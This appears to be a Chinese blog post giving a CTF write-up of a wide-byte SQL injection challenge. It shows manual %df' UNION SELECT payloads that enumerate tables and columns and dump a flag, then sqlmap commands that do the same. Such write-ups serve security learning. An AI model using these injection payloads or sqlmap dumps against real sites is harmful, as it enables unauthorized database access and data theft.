宽字节手注+sqlmap

最新推荐文章于 2025-03-21 21:43:33 发布

江湖混子啊

最新推荐文章于 2025-03-21 21:43:33 发布

阅读量384

点赞数 1

分类专栏：渗透测试

原文链接：https://blog.csdn.net/qq_37729662/article/details/84766326

版权

渗透测试专栏收录该内容

10 篇文章

订阅专栏

ctf：有趣的注入

（一）手注：

url：http://ctf.cdusec.org:8086/sqli.php?id=1
实验工具：火狐hackbar
x001：
输入：” ‘ “单引号无反应，再输入" %df’ "（宽字节注入，显示报错。）
截图：

在这里插入图片描述
在这里插入图片描述
x002判断列数：判断出来有3列。
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +

http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 4 -- +

x003判断注入点：

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,3 -- +

在这里插入图片描述
x003:查询table

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- +

在这里插入图片描述
x004:查询columns。
子查询：
使用单引号，双引号等被注释掉，最后用子查询查到。culumns

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,4))--+

在这里插入图片描述
x005:查询dump

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,flag from flag--+

在这里插入图片描述
x005:
flag:

flag{Just_4_b4by_SQLi}

（二）slqmap跑：
x001：dbs

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" --dbs

x002：tables

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news --tables

x004：dump

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news -T flag --dump